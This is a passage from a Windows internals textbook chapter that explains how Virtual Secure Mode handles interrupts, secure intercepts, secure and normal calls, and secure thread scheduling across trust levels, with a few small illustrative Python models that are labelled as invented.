ing virtual interrupts: Secure Timers, Virtual Interrupt Notification Assist (VINA), and Secure Intercepts.
Note It’s important to understand that the hypervisor requires the underlying hardware to
produce a VMEXIT while managing interrupts that are only of external types. Exceptions are
still managed in the same VTL the processor is executing at (no VMEXIT is generated). If an
instruction causes an exception, the latter is still managed by the structured exception han-
dling (SEH) code located in the current VTL.
To understand the three kinds of virtual interrupts, we must first introduce how interrupts are man-
aged by the hypervisor.
In the hypervisor, each VTL has been designed to securely receive interrupts from devices associated
with its own VTL, to have a secure timer facility which can’t be interfered with by less secure VTLs, and to
be able to prevent interrupts directed to lower VTLs while executing code at a higher VTL. Furthermore, a
VTL should be able to send IPI interrupts to other processors. This design produces the following scenarios:
■ When running at a particular VTL, reception of interrupts targeted at the current VTL results in standard interrupt handling (as determined by the virtual APIC controller of the VP).
■ When an interrupt is received that is targeted at a higher VTL, receipt of the interrupt results in a switch to the higher VTL to which the interrupt is targeted, if the IRQL value of the higher VTL would allow the interrupt to be presented. If the IRQL value of the higher VTL does not allow the interrupt to be delivered, the interrupt is queued without switching the current VTL. This behavior allows a higher VTL to selectively mask interrupts when returning to a lower VTL. This could be useful if the higher VTL is running an interrupt service routine and needs to return to a lower VTL for assistance in processing the interrupt.
■ When an interrupt is received that is targeted at a lower VTL than the current executing VTL of a virtual processor, the interrupt is queued for future delivery to the lower VTL. An interrupt targeted at a lower VTL will never preempt execution of the current VTL. Instead, the interrupt is presented when the virtual processor next transitions to the targeted VTL.
Preventing interrupts directed to lower VTLs is not always a great solution. In many cases, it could
lead to the slowing down of the normal OS execution (especially in mission-critical or game environ-
ments). To better manage these conditions, the VINA has been introduced. As part of its normal event
dispatch loop, the hypervisor checks whether there are pending interrupts queued to a lower VTL. If so,
the hypervisor injects a VINA interrupt to the current executing VTL. The Secure Kernel has a handler
registered for the VINA vector in its virtual IDT. The handler (ShvlVinaHandler function) executes a nor-
mal call (NORMALKERNEL_VINA) to VTL 0 (Normal and Secure Calls are discussed later in this chapter).
This call forces the hypervisor to switch to the normal kernel (VTL 0). Once the VTL is switched, all the queued interrupts are correctly dispatched. The normal kernel then reenters VTL 1 by emitting a SECUREKERNEL_RESUMETHREAD Secure Call.
Secure IRQLs
The VINA handler will not always be executed in VTL 1. Similar to the NT kernel, this depends on the actual IRQL at which the code is executing. The current executing code's IRQL masks all the interrupts that are
associated with an IRQL that’s less than or equal to it. The mapping between an interrupt vector and the
IRQL is maintained by the Task Priority Register (TPR) of the virtual APIC, like in case of real physical APICs
(consult the Intel Architecture Manual for more information). As shown in Figure 9-32, the Secure Kernel
supports different levels of IRQL compared to the normal kernel. Those IRQL are called Secure IRQL.
[Figure 9-32 shows the Secure IRQL levels, from highest to lowest:
15  High/Intercept (synthetic interrupt, hypervisor generated)
14  IPI (synthetic interrupt, hypervisor generated)
6–13  Unused vectors
5   Timer (synthetic interrupt, hypervisor generated)
4   VINA (synthetic interrupt, hypervisor generated)
3   Normal Raised (software interrupt)
2   DPC/Dispatch (software interrupt)
1   APC (software interrupt)
0   Passive/Low (normal thread execution)]
FIGURE 9-32  Secure Kernel interrupt request levels (IRQLs).
The first three secure IRQL are managed by the Secure Kernel in a way similar to the normal world.
Normal APCs and DPCs (targeting VTL 0) still can’t preempt code executing in VTL 1 through the hyper-
visor, but the VINA interrupt is still delivered to the Secure Kernel (the operating system manages the
three software interrupts by writing in the target processor’s APIC Task-Priority Register, an operation
that causes a VMEXIT to the hypervisor. For more information about the APIC TPR, see the Intel, AMD,
or ARM manuals). This means that if a normal-mode DPC is targeted at a processor while it is executing
VTL 1 code (at a compatible secure IRQL, which should be less than Dispatch), the VINA interrupt will
be delivered and will switch the execution context to VTL 0. This effectively executes the DPC in the normal world and temporarily raises the normal kernel's IRQL to dispatch level. When the DPC queue is drained, the normal kernel's IRQL drops. Execution flow returns to the Secure Kernel thanks to
the VSM communication loop code that is located in the VslpEnterIumSecureMode routine. The loop
processes each normal call originated from the Secure Kernel.
The Secure Kernel maps the first three secure IRQLs to the same IRQL of the normal world. When
a Secure call is made from code executing at a particular IRQL (still less or equal to dispatch) in the
normal world, the Secure Kernel switches its own secure IRQL to the same level. Vice versa, when the
Secure Kernel executes a normal call to enter the NT kernel, it switches the normal kernel’s IRQL to the
same level as its own. This works only for the first three levels.
The normal raised level is used when the NT kernel enters the secure world at an IRQL higher than
the DPC level. In those cases, the Secure Kernel maps all of the normal-world IRQLs, which are above
DPC, to its normal raised secure level. Secure Kernel code executing at this level can't receive the VINA for any kind of software interrupt in the normal kernel (but it can still receive a VINA for hardware interrupts). Every time the NT kernel enters the secure world at a normal IRQL above DPC, the Secure Kernel
raises its secure IRQL to normal raised.
Secure IRQLs equal to or higher than VINA can never be preempted by any code in the normal
world. This explains why the Secure Kernel supports the concept of secure, nonpreemptable timers
and Secure Intercepts. Secure timers are generated from the hypervisor's clock interrupt service routine (ISR). Before injecting a synthetic clock interrupt into the NT kernel, this ISR checks whether one or more secure timers have expired. If so, it injects a synthetic secure timer interrupt to VTL 1. Then it proceeds to forward the clock tick interrupt to the normal VTL.
Secure intercepts
There are cases where the Secure Kernel may need to prevent the NT kernel, which executes at a lower
VTL, from accessing certain critical system resources. For example, writes to some processor’s MSRs
could potentially be used to mount an attack that would disable the hypervisor or subvert some of its
protections. VSM provides a mechanism to allow a higher VTL to lock down critical system resources
and prevent access to them by lower VTLs. The mechanism is called secure intercepts.
Secure intercepts are implemented in the Secure Kernel by registering a synthetic interrupt, which
is provided by the hypervisor (remapped in the Secure Kernel to vector 0xF0). The hypervisor, when
certain events cause a VMEXIT, injects a synthetic interrupt to the higher VTL on the virtual processor
that triggered the intercept. At the time of this writing, the Secure Kernel registers with the hypervisor
for the following types of intercepted events:
■ Writes to some vital processor MSRs (Star, Lstar, Cstar, Efer, Sysenter, Ia32Misc, and APIC base on AMD64 architectures) and special registers (GDT, IDT, LDT)
■ Writes to certain control registers (CR0, CR4, and XCR0)
■ Writes to some I/O ports (ports 0xCF8 and 0xCFC are good examples; the intercept manages the reconfiguration of PCI devices)
■ Invalid accesses to protected guest physical memory
When VTL 0 software causes an intercept that will be raised in VTL 1, the Secure Kernel needs to
recognize the intercept type from its interrupt service routine. For this purpose, the Secure Kernel uses the message queue allocated by the SynIC for the "Intercept" synthetic interrupt source (see the "Interpartition communication" section earlier in this chapter for more details about the SynIC and SINTs).
The Secure Kernel is able to discover and map the physical memory page by checking the SIMP syn-
thetic MSR, which is virtualized by the hypervisor. The mapping of the physical page is executed at the
Secure Kernel initialization time in VTL 1. The Secure Kernel’s startup is described later in this chapter.
Intercepts are used extensively by HyperGuard with the goal to protect sensitive parts of the normal
NT kernel. If a malicious rootkit installed in the NT kernel tries to modify the system by writing a par-
ticular value to a protected register (for example to the syscall handlers, CSTAR and LSTAR, or model-
specific registers), the Secure Kernel intercept handler (ShvlpInterceptHandler) filters the new register’s
value, and, if it discovers that the value is not acceptable, it injects a General Protection Fault (GPF)
nonmaskable exception to the NT kernel in VTL 0. This causes an immediate bugcheck resulting in the
system being stopped. If the value is acceptable, the Secure Kernel writes the new value of the register
using the hypervisor through the HvSetVpRegisters hypercall (in this case, the Secure Kernel is proxying
the access to the register).
Control over hypercalls
The last intercept type that the Secure Kernel registers with the hypervisor is the hypercall intercept.
The hypercall intercept’s handler checks that the hypercall emitted by the VTL 0 code to the hypervisor is legitimate and originates from the operating system itself, and not from some external module. Every time a hypercall is emitted in any VTL, it causes a VMEXIT in the hypervisor (by design).
Hypercalls are the base service used by kernel components of each VTL to request services between
each other (and to the hypervisor itself). The hypervisor injects a synthetic intercept interrupt to the
higher VTL only for hypercalls used to request services directly to the hypervisor, skipping all the hy-
percalls used for secure and normal calls to and from the Secure Kernel.
If the hypercall is not recognized as valid, it won’t be executed: in this case, the Secure Kernel updates the lower VTL’s registers to signal the hypercall error. The system is not crashed (although this behavior can change in the future); the calling code can decide how to handle the error.
VSM system calls
As introduced in the previous sections, VSM uses hypercalls to request services to and from the Secure Kernel. Hypercalls were originally designed as a way to request services from the hypervisor, but in VSM the model has been extended to support new types of system calls:
■ Secure calls are emitted by the normal NT kernel in VTL 0 to request services from the Secure Kernel.
■ Normal calls are requested by the Secure Kernel in VTL 1 when it needs services provided by the NT kernel, which runs in VTL 0. Furthermore, some of them are used by secure processes (trustlets) running in Isolated User Mode (IUM) to request services from the Secure Kernel or the normal NT kernel.
These kinds of system calls are implemented in the hypervisor, the Secure Kernel, and the normal
NT kernel. The hypervisor defines two hypercalls for switching between different VTLs: HvVtlCall and
HvVtlReturn. The Secure Kernel and NT kernel define the dispatch loop used for dispatching Secure and
Normal Calls.
Furthermore, the Secure Kernel implements another type of system call: secure system calls. They
provide services only to secure processes (trustlets), which run in IUM. These system calls are not exposed
to the normal NT kernel. The hypervisor is not involved at all while processing secure system calls.
Virtual processor state
Before delving into the Secure and Normal calls architecture, it is necessary to analyze how the virtual
processor manages the VTL transition. Secure VTLs always operate in long mode (which is the execu-
tion model of AMD64 processors where the CPU accesses 64-bit-only instructions and registers), with
paging enabled. Any other execution model is not supported. This simplifies launch and management
of secure VTLs and also provides an extra level of protection for code running in secure mode. (Some
other important implications are discussed later in the chapter.)
For efficiency, a virtual processor has some registers that are shared between VTLs and some other
registers that are private to each VTL. The state of the shared registers does not change when switching
between VTLs. This allows a quick passing of a small amount of information between VTLs, and it also
reduces the context switch overhead when switching between VTLs. Each VTL has its own instance of
private registers, which could only be accessed by that VTL. The hypervisor handles saving and restor-
ing the contents of private registers when switching between VTLs. Thus, when entering a VTL on a
virtual processor, the state of the private registers contains the same values as when the virtual proces-
sor last ran that VTL.
Most of a virtual processor’s register state is shared between VTLs. Specifically, general purpose
registers, vector registers, and floating-point registers are shared between all VTLs with a few excep-
tions, such as the RIP and the RSP registers. Private registers include some control registers, some
architectural registers, and hypervisor virtual MSRs. The secure intercept mechanism (see the previous
section for details) is used to allow the Secure environment to control which MSR can be accessed by
the normal mode environment. Table 9-3 summarizes which registers are shared between VTLs and
which are private to each VTL.
TABLE 9-3  Virtual processor per-VTL register states

Shared
  General registers: Rax, Rbx, Rcx, Rdx, Rsi, Rdi, Rbp, CR2, R8–R15, DR0–DR5, X87 floating point state, XMM registers, AVX registers, XCR0 (XFEM), DR6 (processor-dependent)
  MSRs: HV_X64_MSR_TSC_FREQUENCY, HV_X64_MSR_VP_INDEX, HV_X64_MSR_VP_RUNTIME, HV_X64_MSR_RESET, HV_X64_MSR_TIME_REF_COUNT, HV_X64_MSR_GUEST_IDLE, HV_X64_MSR_DEBUG_DEVICE_OPTIONS, HV_X64_MSR_BELOW_1MB_PAGE, HV_X64_MSR_STATS_PARTITION_RETAIL_PAGE, HV_X64_MSR_STATS_VP_RETAIL_PAGE, MTRRs and PAT, MCG_CAP, MCG_STATUS

Private
  General registers: RIP, RSP, RFLAGS, CR0, CR3, CR4, DR7, IDTR, GDTR, CS, DS, ES, FS, GS, SS, TR, LDTR, TSC, DR6 (processor-dependent)
  MSRs: SYSENTER_CS, SYSENTER_ESP, SYSENTER_EIP, STAR, LSTAR, CSTAR, SFMASK, EFER, KERNEL_GSBASE, FS.BASE, GS.BASE, HV_X64_MSR_HYPERCALL, HV_X64_MSR_GUEST_OS_ID, HV_X64_MSR_REFERENCE_TSC, HV_X64_MSR_APIC_FREQUENCY, HV_X64_MSR_EOI, HV_X64_MSR_ICR, HV_X64_MSR_TPR, HV_X64_MSR_APIC_ASSIST_PAGE, HV_X64_MSR_NPIEP_CONFIG, HV_X64_MSR_SIRBP, HV_X64_MSR_SCONTROL, HV_X64_MSR_SVERSION, HV_X64_MSR_SIEFP, HV_X64_MSR_SIMP, HV_X64_MSR_EOM, HV_X64_MSR_SINT0–HV_X64_MSR_SINT15, HV_X64_MSR_STIMER0_CONFIG–HV_X64_MSR_STIMER3_CONFIG, HV_X64_MSR_STIMER0_COUNT–HV_X64_MSR_STIMER3_COUNT, Local APIC registers (including CR8/TPR)
Secure calls
When the NT kernel needs services provided by the Secure Kernel, it uses a special function,
VslpEnterIumSecureMode. The routine accepts a 104-byte data structure (called SKCALL), which is used
to describe the kind of operation (invoke service, flush TB, resume thread, or call enclave), the secure
call number, and a maximum of twelve 8-byte parameters. The function raises the processor’s IRQL,
if necessary, and determines the value of the Secure Thread cookie. This value communicates to the
Secure Kernel which secure thread will process the request. It then (re)starts the secure calls dispatch
loop. The executability state of each VTL is a state machine that depends on the other VTL.
The loop described by the VslpEnterIumSecureMode function manages all the operations shown
on the left side of Figure 9-33 in VTL 0 (except the case of Secure Interrupts). The NT kernel can decide
to enter the Secure Kernel, and the Secure Kernel can decide to enter the normal NT kernel. The loop
starts by entering the Secure Kernel through the HvlSwitchToVsmVtl1 routine (specifying the opera-
tion requested by the caller). The latter function, which returns only if the Secure Kernel requests a VTL
switch, saves all the shared registers and copies the entire SKCALL data structure in some well-defined
CPU registers: RBX and the SSE registers XMM10 through XMM15. Finally, it emits an HvVtlCall hypercall
to the hypervisor. The hypervisor switches to the target VTL (by loading the saved per-VTL VMCS) and
writes a VTL secure call entry reason to the VTL control page. Indeed, to be able to determine why a se-
cure VTL was entered, the hypervisor maintains an informational memory page that is shared by each
secure VTL. This page is used for bidirectional communication between the hypervisor and the code
running in a secure VTL on a virtual processor.
[Figure 9-33 shows the two sides of the loop: the NT kernel in VTL 0 enters the Secure Kernel when it starts or resumes a secure thread, emits a secure call, or has processed a normal call, the VINA, or a secure interrupt; the Secure Kernel in VTL 1 returns to the NT kernel when it terminates a secure thread, has processed a secure call or a secure interrupt, dispatches the VINA, or emits a normal call.]
FIGURE 9-33  The VSM dispatch loop.
The virtual processor restarts the execution in VTL 1 context, in the SkCallNormalMode function of
the Secure Kernel. The code reads the VTL entry reason; if it’s not a Secure Interrupt, it loads the current
processor SKPRCB (Secure Kernel processor control block), selects a thread on which to run (starting
from the secure thread cookie), and copies the content of the SKCALL data structure from the CPU
shared registers to a memory buffer. Finally, it calls the IumInvokeSecureService dispatcher routine,
which will process the requested secure call, by dispatching the call to the correct function (and imple-
ments part of the dispatch loop in VTL 1).
An important concept to understand is that the Secure Kernel can map and access VTL 0 memory, so there’s no need to marshal and copy any data structure pointed to by the parameters into VTL 1 memory. This does not apply to normal calls, as we discuss in the next section.
As we have seen in the previous section, Secure Interrupts (and intercepts) are dispatched by the
hypervisor, which preempts any code executing in VTL 0. In this case, when the VTL 1 code starts the ex-
ecution, it dispatches the interrupt to the right ISR. After the ISR finishes, the Secure Kernel immediately
emits a HvVtlReturn hypercall. As a result, the code in VTL 0 restarts the execution at the point in which
it has been previously interrupted, which is not located in the secure calls dispatch loop. Therefore,
Secure Interrupts are not part of the dispatch loop even if they still produce a VTL switch.
Normal calls
Normal calls are managed similarly to the secure calls (with an analogous dispatch loop located in
VTL 1, called normal calls loop), but with some important differences:
■ All the shared VTL registers are securely cleaned up by the Secure Kernel before emitting the HvVtlReturn to the hypervisor for switching the VTL. This prevents leaking any kind of secure data to normal mode.
■ The normal NT kernel can’t read secure VTL 1 memory. To correctly pass the syscall parameters and data structures needed for the normal call, a memory buffer that both the Secure Kernel and the normal kernel can share is required. The Secure Kernel allocates this shared buffer using the ALLOCATE_VM normal call (which does not require passing any pointer as a parameter). The latter is dispatched to the MmAllocateVirtualMemory function in the NT normal kernel. The allocated memory is remapped in the Secure Kernel at the same virtual address and becomes part of the secure process’s shared memory pool.
■ As we will discuss later in the chapter, Isolated User Mode (IUM) was originally designed to be able to execute special Win32 executables, which should have been capable of running indifferently in the normal world or in the secure world. The standard unmodified Ntdll.dll and KernelBase.dll libraries are mapped even in IUM. This fact has the important consequence of requiring almost all the native NT APIs (which Kernel32.dll and many other user mode libraries depend on) to be proxied by the Secure Kernel.
To correctly deal with the described problems, the Secure Kernel includes a marshaler, which identifies and copies the data structures pointed to by the parameters of an NT API into the shared buffer. The marshaler is also able to determine the size of the shared buffer, which will be allocated from the secure process memory pool. The Secure Kernel defines three types of normal calls:
■ A disabled normal call is not implemented in the Secure Kernel and, if called from IUM, it simply fails with a STATUS_INVALID_SYSTEM_SERVICE exit code. This kind of call can’t be called directly by the Secure Kernel itself.
■ An enabled normal call is implemented only in the NT kernel and is callable from IUM in its original Nt or Zw version (through Ntdll.dll). The Secure Kernel itself can also request an enabled normal call, but only through a small stub of code that loads the normal call number, sets the highest bit in the number, and calls the normal call dispatcher (the IumGenericSyscall routine). The highest bit identifies the normal call as requested by the Secure Kernel itself and not by the Ntdll.dll module loaded in IUM.
■ A special normal call is implemented partially or completely in the Secure Kernel (VTL 1), which can filter the original function’s results or entirely reimplement its code.
Enabled and special normal calls can be marked as KernelOnly. In that case, the normal call can be requested only from the Secure Kernel itself (and not from secure processes). We’ve already
provided the list of enabled and special normal calls (which are callable from software running in VSM)
in Chapter 3 of Part 1, in the section named “Trustlet-accessible system calls.”
Figure 9-34 shows an example of a special normal call. In the example, the LsaIso trustlet has called the NtQueryInformationProcess native API to request information about a particular process. The Ntdll.dll
mapped in IUM prepares the syscall number and executes a SYSCALL instruction, which transfers the
execution flow to the KiSystemServiceStart global system call dispatcher, residing in the Secure Kernel
(VTL 1). The global system call dispatcher recognizes that the system call number belongs to a normal
call and uses the number to access the IumSyscallDispatchTable array, which represents the normal calls
dispatch table.
354
CHAPTER 9 Virtualization technologies
The normal calls dispatch table contains an array of compacted entries, which are generated in
phase 0 of the Secure Kernel startup (discussed later in this chapter). Each entry contains an offset to
a target function (calculated relative to the table itself) and the number of its arguments (with some
flags). All the offsets in the table are initially calculated to point to the normal call dispatcher routine
(IumGenericSyscall). After the first initialization cycle, the Secure Kernel startup routine patches each
entry that represents a special call. The new offset points to the part of the code that implements
the normal call in the Secure Kernel.
[Figure: the LsaIso trustlet's Ntdll.dll stub (MOV R10, RCX / MOV EAX, 19h / SYSCALL) reaches the
global system call dispatcher in the Secure Kernel, which indexes the normal calls dispatch table
(IumSyscallDispatchTable). Each compacted entry holds a target offset (shifted left by 5), the
number of arguments, flags, the type of normal call, and an enclave-compatible bit; unpatched
entries hold the offset of IumGenericSyscall.]
FIGURE 9-34 A trustlet performing a special normal call to the NtQueryInformationProcess API.
As a result, in Figure 9-34, the global system calls dispatcher transfers execution to the
NtQueryInformationProcess function’s part implemented in the Secure Kernel. The latter checks
whether the requested information class is part of the small subset exposed to the Secure Kernel and,
if so, uses a small stub of code to call the normal call dispatcher routine (IumGenericSyscall).
Figure 9-35 shows the syscall selector number for the NtQueryInformationProcess API. Note that the stub
sets the highest bit (N bit) of the syscall number to indicate that the normal call is requested by the Secure
Kernel. The normal call dispatcher checks the parameters and calls the marshaler, which is able to marshal
each argument and copy it in the right offset of the shared buffer. There is another bit in the selector that
further differentiates between a normal call or a secure system call, which is discussed later in this chapter.
[Figure: the syscall selector number layout — bit 31 is the N bit (called from the Secure Kernel),
a lower bit is the S bit (secure system call), and the low bits hold the syscall index (25 for
NtQueryInformationProcess).]
FIGURE 9-35 The syscall selector number of the Secure Kernel.
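The selector layout can be sketched as a small classification routine. The N-bit position (bit 31) comes from the text; the S-bit position is assumed here from the "twenty-eighth bit" description given later for AMD64, and the index mask is invented for illustration.

```python
# Sketch of how the global system call dispatcher could classify a selector
# (bit positions partly assumed, not verified against the binary).
N_BIT = 1 << 31          # set by the Secure Kernel's stub code (normal call)
S_BIT = 1 << 27          # "twenty-eighth bit" on AMD64 (bit 16 on ARM64)
INDEX_MASK = 0xFFFF      # invented: low bits carry the syscall index

def classify_selector(selector):
    index = selector & INDEX_MASK
    if selector & S_BIT:
        return ("secure-system-call", index)           # -> SkiSecureServiceTable
    origin = "secure-kernel" if selector & N_BIT else "ium-trustlet"
    return ("normal-call:" + origin, index)

# NtQueryInformationProcess (index 25) requested by the Secure Kernel's stub:
kind, idx = classify_selector(N_BIT | 25)
```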
The marshaler works thanks to two important arrays that describe each normal call: the descriptors
array (shown on the right side of Figure 9-34) and the arguments descriptors array. From these arrays,
the marshaler can fetch all the information that it needs: normal call type, marshaling function index,
argument type, size, and type of data pointed to (if the argument is a pointer).
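The marshaling step can be modeled with a toy argument-descriptor list. The descriptor layout, the sizes, and the `marshal` helper are all invented; only the idea — per-argument type and size metadata driving copies into a single shared buffer at computed offsets — reflects the text.

```python
# Toy model of the marshaler: descriptors drive the layout of a shared buffer.
# (name, size_in_bytes, is_pointer) — hypothetical descriptors for one call.
ARG_DESCRIPTORS = [
    ("ProcessHandle", 8, False),
    ("InformationClass", 4, False),
    ("Buffer", 16, True),      # pointer: the pointed-to data is copied
]

def marshal(args):
    """Pack arguments into one shared buffer; return (buffer, offsets)."""
    buf = bytearray()
    offsets = {}
    for (name, size, is_ptr), value in zip(ARG_DESCRIPTORS, args):
        offsets[name] = len(buf)
        if is_ptr:
            # Copy the pointed-to data, zero-padded to the declared size.
            buf += bytes(value[:size]).ljust(size, b"\0")
        else:
            buf += int(value).to_bytes(size, "little")
    return bytes(buf), offsets

shared, offs = marshal([0x1234, 7, b"payload"])
```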
After the shared buffer has been correctly filled by the marshaler, the Secure Kernel compiles the
SKCALL data structure and enters the normal call dispatcher loop (SkCallNormalMode). This part of
the loop saves and clears all the shared virtual CPU registers, disables interrupts, and moves the
thread context to the PRCB thread (more about thread scheduling later in the chapter). It then
copies the content of the SKCALL data structure into some shared registers. As a final stage, it
calls the hypervisor through the HvVtlReturn hypercall.
Then the code execution resumes in the secure call dispatch loop in VTL 0. If there are some pending
interrupts in the queue, they are processed as normal (only if the IRQL allows it). The loop recognizes
the normal call operation request and calls the NtQueryInformationProcess function implemented in
VTL 0. After the latter function has finished its processing, the loop restarts and reenters the Secure
Kernel again (as for secure calls), still through the HvlSwitchToVsmVtl1 routine, but with a different operation
request: Resume thread. This, as the name implies, allows the Secure Kernel to switch to the original
secure thread and to continue the execution that has been preempted for executing the normal call.
The implementation of enabled normal calls is the same except for the fact that those calls have
their entries in the normal calls dispatch table, which point directly to the normal call dispatcher
routine, IumGenericSyscall. In this way, the code will transfer directly to the handler, skipping any
API implementation code in the Secure Kernel.
Secure system calls
The last type of system calls available in the Secure Kernel is similar to standard system calls provided
by the NT kernel to VTL 0 user mode software. The secure system calls are used for providing services
only to the secure processes (trustlets). VTL 0 software can’t emit secure system calls in any way. As
we will discuss in the “Isolated User Mode” section later in this chapter, every trustlet maps the IUM
Native Layer DLL (Iumdll.dll) in its address space. Iumdll.dll has the same job as its counterpart
in VTL 0, Ntdll.dll: implementing the native syscall stub functions for user mode applications. The
stub copies the syscall number in a register and emits the SYSCALL instruction (the instruction uses
different opcodes depending on the platform).
Secure system call numbers always have the twenty-eighth bit set to 1 (on AMD64 architectures,
whereas ARM64 uses the sixteenth bit). In this way, the global system call dispatcher (KiSystemServiceStart)
recognizes that the syscall number belongs to a secure system call (and not a normal call) and switches
to the SkiSecureServiceTable, which represents the secure system calls dispatch table. As in the case of
normal calls, the global dispatcher verifies that the call number is within the limit, allocates stack
space for the arguments (if needed), calculates the system call's final address, and transfers the code
execution to it.
Overall, the code execution remains in VTL 1, but the current privilege level of the virtual processor
rises from 3 (user mode) to 0 (kernel mode). The dispatch table for secure system calls is compacted—
similarly to the normal calls dispatch table—at phase 0 of the Secure Kernel startup. However, entries in
this table are all valid and point to functions implemented in the Secure Kernel.
Secure threads and scheduling
As we will describe in the “Isolated User Mode” section, the execution units in VSM are the secure
threads, which live in the address space described by a secure process. Secure threads can be kernel
mode or user mode threads. VSM maintains a strict correspondence between each user mode secure
thread and a normal thread living in VTL 0.
Indeed, the Secure Kernel thread scheduling depends completely on the normal NT kernel; the
Secure Kernel doesn’t include a proprietary scheduler (by design, the Secure Kernel attack surface
needs to be small). In Chapter 3 of Part 1, we described how the NT kernel creates a process and the
relative initial thread. In the section that describes Stage 4, “Creating the initial thread and its stack
and context,” we explain that a thread creation is performed in two parts:
■	The executive thread object is created; its kernel and user stacks are allocated. The
KeInitThread routine is called for setting up the initial thread context for user mode threads.
KiStartUserThread is the first routine that will be executed in the context of the new thread,
which will lower the thread's IRQL and call PspUserThreadStartup.
■	The execution control is then returned to NtCreateUserProcess, which, at a later stage, calls
PspInsertThread to complete the initialization of the thread and insert it into the object manager
namespace.
As part of its work, when PspInsertThread detects that the thread belongs to a secure process, it
calls VslCreateSecureThread, which, as the name implies, uses the Create Thread secure service call
to ask the Secure Kernel to create an associated secure thread. The Secure Kernel verifies the
parameters and gets the process's secure image data structure (more details about this later in this chapter).
It then allocates the secure thread object and its TEB, creates the initial thread context (the first routine
that will run is SkpUserThreadStartup), and finally makes the thread schedulable. Furthermore, the
secure service handler in VTL 1, after marking the thread as ready to run, returns a specific thread cookie,
which is stored in the ETHREAD data structure.
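The two-sided creation flow can be sketched as follows. The function names echo the routines mentioned in the text (PspInsertThread, the Create Thread secure service, SkpUserThreadStartup), but all data structures and the details of the cookie scheme are invented for illustration.

```python
# Toy model of secure thread creation across VTLs (all structures invented).
import itertools

_cookie_gen = itertools.count(1)      # 0 is reserved: "no secure thread"
secure_threads = {}                    # cookie -> secure thread state (VTL 1 side)

def create_thread_secure_service(process_is_trustlet):
    """VTL 1 handler for the Create Thread secure service call."""
    if not process_is_trustlet:
        raise ValueError("only secure processes get secure threads")
    cookie = next(_cookie_gen)
    # First routine that will run in the new secure thread's context:
    secure_threads[cookie] = {"start": "SkpUserThreadStartup", "ready": True}
    return cookie

def psp_insert_thread(ethread, process_is_trustlet):
    """VTL 0 side: complete thread init; request the secure thread if needed,
    storing the returned cookie in the (simulated) ETHREAD."""
    if process_is_trustlet:
        ethread["secure_cookie"] = create_thread_secure_service(True)
    return ethread

et = psp_insert_thread({"name": "LsaIso!main"}, process_is_trustlet=True)
```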
The new secure thread still starts in VTL 0. As described in the “Stage 7” section of Chapter 3 of
Part 1, PspUserThreadStartup performs the final initialization of the user thread in the new context.
In case it determines that the thread’s owning process is a trustlet, PspUserThreadStartup calls the
VslStartSecureThread function, which invokes the secure calls dispatch loop through the
VslpEnterIumSecureMode routine in VTL 0 (passing the secure thread cookie returned by the Create Thread secure
service handler). The first operation that the dispatch loop requests to the Secure Kernel is to resume
the execution of the secure thread (still through the HvVtlCall hypercall).
The Secure Kernel, before the switch to VTL 0, was executing code in the normal call dispatcher
loop (SkCallNormalMode). The hypercall executed by the normal kernel restarts the execution in the
same loop routine. The VTL 1 dispatcher loop recognizes the new thread resume request; it switches
its execution context to the new secure thread, attaches to its address spaces, and makes it runnable.
As part of the context switching, a new stack is selected (which has been previously initialized by the
Create Thread secure call). The latter contains the address of the first secure thread system function,
SkpUserThreadStartup, which, similarly to the case of normal NT threads, sets up the initial thunk con-
text to run the image-loader initialization routine (LdrInitializeThunk in Ntdll.dll).
After it has started, the new secure thread can return to normal mode for two main reasons: it emits
a normal call, which needs to be processed in VTL 0, or the VINA interrupts preempt the code execu-
tion. Even though the two cases are processed in a slightly different way, they both result in executing
the normal call dispatcher loop (SkCallNormalMode).
As previously discussed in Part 1, Chapter 4, "Threads," the NT scheduler works thanks to the
processor clock, which generates an interrupt every time the system clock fires (usually every 15.6
milliseconds). The clock interrupt service routine updates the processor times and calculates whether
the thread quantum has expired. The interrupt is targeted at VTL 0, so, when the virtual processor is
executing code in VTL 1, the hypervisor injects a VINA interrupt to the Secure Kernel, as shown in
Figure 9-36. The VINA interrupt preempts the currently executing code, lowers the IRQL to the
previously preempted code's IRQL value, and emits the VINA normal call for entering VTL 0.
[Figure: on VP 0, a DPC or clock timer interrupt raises a VINA while secure thread 80 runs in VTL 1;
the Secure Kernel deselects thread 80, marks it as not running, and performs a VTL return into the
normal call dispatch loop, where the NT scheduler schedules a new thread (the thread's quantum
expired). Later, VP 3 schedules thread 80 again: a VTL call (resume thread) reenters VTL 1, the
secure call dispatch loop selects secure thread 80, switches to its stack, and resumes its execution.]
FIGURE 9-36 Secure threads scheduling scheme.
As in the standard process of normal call dispatching, before the Secure Kernel emits the HvVtlReturn
hypercall, it deselects the current execution thread from the virtual processor's PRCB. This is important:
The VP in VTL 1 is not tied to any thread context anymore and, on the next loop cycle, the Secure Kernel
can switch to a different thread or decide to reschedule the execution of the current one.
After the VTL switch, the NT kernel resumes execution in the secure calls dispatch loop, still in the
context of the new thread. Before the loop has any chance to execute any code, it is preempted by
the clock interrupt service routine, which can calculate the new quantum value and, if the latter has
expired, switch execution to another thread. When a context switch occurs and another thread
enters VTL 1, the normal call dispatch loop schedules a different secure thread depending on the value
of the secure thread cookie:
■	A secure thread from the secure thread pool if the normal NT kernel has entered VTL 1 for
dispatching a secure call (in this case, the secure thread cookie is 0).
■	The newly created secure thread if the thread has been rescheduled for execution (the secure
thread cookie is a valid value). As shown in Figure 9-36, the new thread can also be rescheduled
by another virtual processor (VP 3 in the example).
With the described schema, all the scheduling decisions are performed only in VTL 0. The secure
call loop and normal call loops cooperate to correctly switch the secure thread context in VTL 1. All the
secure threads have an associated thread in the normal kernel. The opposite is not true, though; if a
normal thread in VTL 0 decides to emit a secure call, the Secure Kernel dispatches the request by using
an arbitrary thread context from a thread pool.
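The cookie-driven selection just described can be reduced to a few lines. This is a conceptual sketch; the pool policy shown (round-robin) is an invented stand-in for whatever the Secure Kernel actually does.

```python
# Minimal sketch of the VTL 1 dispatch-loop decision: cookie 0 (a plain secure
# call) borrows an arbitrary thread from the secure thread pool; a valid
# cookie resumes that specific secure thread.
from collections import deque

thread_pool = deque(["pool-thread-A", "pool-thread-B"])
secure_threads = {42: "secure-thread-42"}

def select_secure_thread(cookie):
    if cookie == 0:
        # Secure call emitted by an arbitrary VTL 0 thread: use a pool thread.
        t = thread_pool.popleft()
        thread_pool.append(t)          # rotate it back into the pool
        return t
    return secure_threads[cookie]      # resume the associated secure thread
```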
The Hypervisor Enforced Code Integrity
Hypervisor Enforced Code Integrity (HVCI) is the feature that powers Device Guard and provides the
